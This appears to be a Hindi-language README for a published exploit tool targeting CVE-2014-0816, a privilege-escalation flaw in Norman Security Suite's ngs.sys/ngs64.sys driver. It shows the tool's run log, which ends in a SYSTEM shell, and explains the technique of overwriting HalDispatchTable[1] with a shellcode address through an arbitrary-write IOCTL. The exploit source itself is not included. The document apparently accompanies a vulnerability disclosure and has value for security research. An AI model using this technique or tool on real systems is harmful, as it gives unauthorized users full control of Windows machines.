
CVE-2014-0816
यह CVE-2014-0816 (JVNDB-2014-000026: Norman Security Suite विशेषाधिकार वृद्धि के लिए संवेदनशील है) के लिए एक एक्सप्लॉइट है।
यह एक्सप्लॉइट ngs.sys / ngs64.sys के IOCTL हैंडलर में भेद्यता का फायदा उठाकर गैर-प्रशासक विशेषाधिकार से SYSTEM विशेषाधिकार के साथ CMD.exe लॉन्च करता है।
C:\Users\user\Desktop> exploit_ngs.exe
[*] Exploit Norman General Security Driver (ngs.sys / ngs64.sys)
[*] Target file version: ver 5.0.740.0.
[*] An address file was created at C:\Users\user\Desktop\address.bin.
[*] Shellcode is located at 000000013F9357D0.
[*] The device was opened as 0000000000000044.
[*] The address file was opened as FFFFFFFF80000558.
[+] HalDispatchTable[1] is located at FFFFF800033FDC68.
[+] HalDispatchTable[1] was altered.
[+] Shellcode was executed.
[+] The SYSTEM shell was launched.
[*] Press any key to finish this program.
फिर आपको एक नया कंसोल दिखाई देगा।
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\user\Desktop>whoami
nt authority\system
भेद्यता एक हमलावर को मनमाने पते को मनमाने मान से अधिलेखित करने की अनुमति देती है, इसलिए यह एक्सप्लॉइट HalDispatchTable[1] के मान को शेलकोड के पते से बदल देता है जो वर्तमान प्रक्रिया के विशेषाधिकार को SYSTEM विशेषाधिकार तक बढ़ा देता है।

यह भेद्यता Windows XP से 8 तक x86/x64 दोनों वाले सभी प्लेटफ़ॉर्म पर शोषणीय होगी, लेकिन यह एक्सप्लॉइट कुछ निश्चित प्लेटफ़ॉर्म के लिए डिज़ाइन और परीक्षण किया गया है (उदाहरण के लिए, यह SMEP के कारण Windows 8 पर कार्य नहीं करेगा)।
यह सॉफ़्टवेयर MIT लाइसेंस के अंतर्गत जारी किया गया है, LICENSE देखें।